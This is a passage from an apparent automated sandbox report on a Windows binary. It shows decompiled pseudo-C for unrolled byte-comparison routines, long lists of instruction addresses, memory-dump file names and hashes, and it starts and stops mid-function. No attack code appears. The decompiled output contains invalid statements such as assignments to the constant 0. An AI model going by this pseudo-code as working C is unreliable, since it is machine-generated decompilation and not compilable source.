								goto L25;
							}
							_t245 = (0 | _t334 > 0x00000000) * 2 - 1;
							if(_t245 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t245 = (0 | _t332 > 0x00000000) * 2 - 1;
						if(_t245 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t245 = (0 | _t330 > 0x00000000) * 2 - 1;
					if(_t245 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t196 = _t245;
				return _t196;
			}
































                                                        0x00a65c45
                                                        0x00a65c45
                                                        0x00a65c4b
                                                        0x00a65cd2
                                                        0x00a65cd4
                                                        0x00a65cd6
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65cdc
                                                        0x00a65ce2
                                                        0x00a65d69
                                                        0x00a65d6b
                                                        0x00a65d6d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65d73
                                                        0x00a65d79
                                                        0x00a65e00
                                                        0x00a65e02
                                                        0x00a65e04
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65e0a
                                                        0x00a65e10
                                                        0x00a65e97
                                                        0x00a65e99
                                                        0x00a65e9b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65ea7
                                                        0x00a65f2f
                                                        0x00a65f31
                                                        0x00a65f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65f39
                                                        0x00a65f3f
                                                        0x00a65fc6
                                                        0x00a65fc8
                                                        0x00a65fca
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65fd0
                                                        0x00a65fd6
                                                        0x00a6605d
                                                        0x00a6605f
                                                        0x00a66061
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6606f
                                                        0x00a66071
                                                        0x00a66089
                                                        0x00a66091
                                                        0x00a66093
                                                        0x00a657ed
                                                        0x00a657f5
                                                        0x00a657f7
                                                        0x00a65804
                                                        0x00a65804
                                                        0x00000000
                                                        0x00a657f7
                                                        0x00a660a0
                                                        0x00a657e7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a657e7
                                                        0x00a6607a
                                                        0x00a66083
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a66083
                                                        0x00a65fe3
                                                        0x00a65fe5
                                                        0x00a65ffd
                                                        0x00a66005
                                                        0x00a66007
                                                        0x00a6601f
                                                        0x00a66027
                                                        0x00a66029
                                                        0x00a66041
                                                        0x00a66049
                                                        0x00a6604b
                                                        0x00a66054
                                                        0x00a66054
                                                        0x00000000
                                                        0x00a6604b
                                                        0x00a66032
                                                        0x00a6603b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6603b
                                                        0x00a66010
                                                        0x00a66019
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a66019
                                                        0x00a65fee
                                                        0x00a65ff7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65ff7
                                                        0x00a65f4c
                                                        0x00a65f4e
                                                        0x00a65f66
                                                        0x00a65f6e
                                                        0x00a65f70
                                                        0x00a65f88
                                                        0x00a65f90
                                                        0x00a65f92
                                                        0x00a65faa
                                                        0x00a65fb2
                                                        0x00a65fb4
                                                        0x00a65fbd
                                                        0x00a65fbd
                                                        0x00000000
                                                        0x00a65fb4
                                                        0x00a65f9b
                                                        0x00a65fa4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65fa4
                                                        0x00a65f79
                                                        0x00a65f82
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65f82
                                                        0x00a65f57
                                                        0x00a65f60
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65f60
                                                        0x00a65eb5
                                                        0x00a65eb7
                                                        0x00a65ecf
                                                        0x00a65ed7
                                                        0x00a65ed9
                                                        0x00a65ef1
                                                        0x00a65ef9
                                                        0x00a65efb
                                                        0x00a65f13
                                                        0x00a65f1b
                                                        0x00a65f1d
                                                        0x00a65f26
                                                        0x00a65f26
                                                        0x00000000
                                                        0x00a65f1d
                                                        0x00a65f04
                                                        0x00a65f0d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65f0d
                                                        0x00a65ee2
                                                        0x00a65eeb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65eeb
                                                        0x00a65ec0
                                                        0x00a65ec9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65ec9
                                                        0x00a65e1d
                                                        0x00a65e1f
                                                        0x00a65e37
                                                        0x00a65e3f
                                                        0x00a65e41
                                                        0x00a65e59
                                                        0x00a65e61
                                                        0x00a65e63
                                                        0x00a65e7b
                                                        0x00a65e83
                                                        0x00a65e85
                                                        0x00a65e8e
                                                        0x00a65e8e
                                                        0x00000000
                                                        0x00a65e85
                                                        0x00a65e6c
                                                        0x00a65e75
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65e75
                                                        0x00a65e4a
                                                        0x00a65e53
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65e53
                                                        0x00a65e28
                                                        0x00a65e31
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65e31
                                                        0x00a65d86
                                                        0x00a65d88
                                                        0x00a65da0
                                                        0x00a65da8
                                                        0x00a65daa
                                                        0x00a65dc2
                                                        0x00a65dca
                                                        0x00a65dcc
                                                        0x00a65de4
                                                        0x00a65dec
                                                        0x00a65dee
                                                        0x00a65df7
                                                        0x00a65df7
                                                        0x00000000
                                                        0x00a65dee
                                                        0x00a65dd5
                                                        0x00a65dde
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65dde
                                                        0x00a65db3
                                                        0x00a65dbc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65dbc
                                                        0x00a65d91
                                                        0x00a65d9a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65d9a
                                                        0x00a65cef
                                                        0x00a65cf1
                                                        0x00a65d09
                                                        0x00a65d11
                                                        0x00a65d13
                                                        0x00a65d2b
                                                        0x00a65d33
                                                        0x00a65d35
                                                        0x00a65d4d
                                                        0x00a65d55
                                                        0x00a65d57
                                                        0x00a65d60
                                                        0x00a65d60
                                                        0x00000000
                                                        0x00a65d57
                                                        0x00a65d3e
                                                        0x00a65d47
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65d47
                                                        0x00a65d1c
                                                        0x00a65d25
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65d25
                                                        0x00a65cfa
                                                        0x00a65d03
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65c51
                                                        0x00a65c51
                                                        0x00a65c58
                                                        0x00a65c5a
                                                        0x00a65c72
                                                        0x00a65c72
                                                        0x00a65c7a
                                                        0x00a65c7c
                                                        0x00a65c94
                                                        0x00a65c94
                                                        0x00a65c9c
                                                        0x00a65c9e
                                                        0x00a65cb6
                                                        0x00a65cb6
                                                        0x00a65cbe
                                                        0x00a65cc0
                                                        0x00a65cc9
                                                        0x00a65cc9
                                                        0x00000000
                                                        0x00a65cc0
                                                        0x00a65ca4
                                                        0x00a65ca7
                                                        0x00a65cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65cb0
                                                        0x00a65c82
                                                        0x00a65c85
                                                        0x00a65c8e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65c8e
                                                        0x00a65c60
                                                        0x00a65c63
                                                        0x00a65c6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65c6c
                                                        0x00a653d3
                                                        0x00a653d3
                                                        0x00a661c3

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                        • Instruction ID: c918b17640eeb11a3ff75163cffc5ed848ded97464def75f0890e0e1f7fe4faa
                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                        • Instruction Fuzzy Hash: 85C19532A0959349DF6D873AC43413FBAB15AA2BB171A076DD4F3CF1C5EE60C924DA20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A653DB, Relevance: .3, Instructions: 331COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A653DB(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                                                        0x00a653db
                                                        0x00a653db
                                                        0x00a653e1
                                                        0x00a65458
                                                        0x00a6545a
                                                        0x00a6545c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65462
                                                        0x00a65468
                                                        0x00a654ef
                                                        0x00a654f1
                                                        0x00a654f3
                                                        0x00000000
                                                        0x00000000
                                                        0x00a654f9
                                                        0x00a654ff
                                                        0x00a65586
                                                        0x00a65588
                                                        0x00a6558a
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65590
                                                        0x00a65596
                                                        0x00a6561d
                                                        0x00a6561f
                                                        0x00a65621
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65627
                                                        0x00a6562d
                                                        0x00a656b4
                                                        0x00a656b6
                                                        0x00a656b8
                                                        0x00000000
                                                        0x00000000
                                                        0x00a656c4
                                                        0x00a6574c
                                                        0x00a6574e
                                                        0x00a65750
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65756
                                                        0x00a6575c
                                                        0x00a657e3
                                                        0x00a657e5
                                                        0x00a657e7
                                                        0x00a657f5
                                                        0x00a657f7
                                                        0x00a65804
                                                        0x00a65804
                                                        0x00a657f7
                                                        0x00000000
                                                        0x00a657e7
                                                        0x00a65769
                                                        0x00a6576b
                                                        0x00a65783
                                                        0x00a6578b
                                                        0x00a6578d
                                                        0x00a657a5
                                                        0x00a657ad
                                                        0x00a657af
                                                        0x00a657c7
                                                        0x00a657cf
                                                        0x00a657d1
                                                        0x00a657da
                                                        0x00a657da
                                                        0x00000000
                                                        0x00a657d1
                                                        0x00a657b8
                                                        0x00a657c1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a657c1
                                                        0x00a65796
                                                        0x00a6579f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6579f
                                                        0x00a65774
                                                        0x00a6577d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6577d
                                                        0x00a656d2
                                                        0x00a656d4
                                                        0x00a656ec
                                                        0x00a656f4
                                                        0x00a656f6
                                                        0x00a6570e
                                                        0x00a65716
                                                        0x00a65718
                                                        0x00a65730
                                                        0x00a65738
                                                        0x00a6573a
                                                        0x00a65743
                                                        0x00a65743
                                                        0x00000000
                                                        0x00a6573a
                                                        0x00a65721
                                                        0x00a6572a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6572a
                                                        0x00a656ff
                                                        0x00a65708
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65708
                                                        0x00a656dd
                                                        0x00a656e6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a656e6
                                                        0x00a6563a
                                                        0x00a6563c
                                                        0x00a65654
                                                        0x00a6565c
                                                        0x00a6565e
                                                        0x00a65676
                                                        0x00a6567e
                                                        0x00a65680
                                                        0x00a65698
                                                        0x00a656a0
                                                        0x00a656a2
                                                        0x00a656ab
                                                        0x00a656ab
                                                        0x00000000
                                                        0x00a656a2
                                                        0x00a65689
                                                        0x00a65692
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65692
                                                        0x00a65667
                                                        0x00a65670
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65670
                                                        0x00a65645
                                                        0x00a6564e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6564e
                                                        0x00a655a3
                                                        0x00a655a5
                                                        0x00a655bd
                                                        0x00a655c5
                                                        0x00a655c7
                                                        0x00a655df
                                                        0x00a655e7
                                                        0x00a655e9
                                                        0x00a65601
                                                        0x00a65609
                                                        0x00a6560b
                                                        0x00a65614
                                                        0x00a65614
                                                        0x00000000
                                                        0x00a6560b
                                                        0x00a655f2
                                                        0x00a655fb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a655fb
                                                        0x00a655d0
                                                        0x00a655d9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a655d9
                                                        0x00a655ae
                                                        0x00a655b7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a655b7
                                                        0x00a6550c
                                                        0x00a6550e
                                                        0x00a65526
                                                        0x00a6552e
                                                        0x00a65530
                                                        0x00a65548
                                                        0x00a65550
                                                        0x00a65552
                                                        0x00a6556a
                                                        0x00a65572
                                                        0x00a65574
                                                        0x00a6557d
                                                        0x00a6557d
                                                        0x00000000
                                                        0x00a65574
                                                        0x00a6555b
                                                        0x00a65564
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65564
                                                        0x00a65539
                                                        0x00a65542
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65542
                                                        0x00a65517
                                                        0x00a65520
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65520
                                                        0x00a65475
                                                        0x00a65477
                                                        0x00a6548f
                                                        0x00a65497
                                                        0x00a65499
                                                        0x00a654b1
                                                        0x00a654b9
                                                        0x00a654bb
                                                        0x00a654d3
                                                        0x00a654db
                                                        0x00a654dd
                                                        0x00a654e6
                                                        0x00a654e6
                                                        0x00000000
                                                        0x00a654dd
                                                        0x00a654c4
                                                        0x00a654cd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a654cd
                                                        0x00a654a2
                                                        0x00a654ab
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a654ab
                                                        0x00a65480
                                                        0x00a65489
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a653e3
                                                        0x00a653e3
                                                        0x00a653ea
                                                        0x00a653ec
                                                        0x00a65400
                                                        0x00a65400
                                                        0x00a65408
                                                        0x00a6540a
                                                        0x00a6541e
                                                        0x00a6541e
                                                        0x00a65426
                                                        0x00a65428
                                                        0x00a6543c
                                                        0x00a6543c
                                                        0x00a65444
                                                        0x00a65446
                                                        0x00a6544f
                                                        0x00a6544f
                                                        0x00000000
                                                        0x00a65446
                                                        0x00a6542e
                                                        0x00a65431
                                                        0x00a6543a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6543a
                                                        0x00a65410
                                                        0x00a65413
                                                        0x00a6541c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6541c
                                                        0x00a653f2
                                                        0x00a653f5
                                                        0x00a653fe
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a653fe
                                                        0x00a653d3
                                                        0x00a653d3
                                                        0x00a661c3

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                        • Instruction ID: c70b38d836e75d07848d25edf7ba05f4c3549fa3f5b12bd9a1e1a8490d46bb5c
                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                        • Instruction Fuzzy Hash: 92C17636A095A30ADF2D4739C43413FBAB15AA27B171A076DD4F3CF1D4EEA0C964DA20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A64FC3, Relevance: .3, Instructions: 323COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A64FC3(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
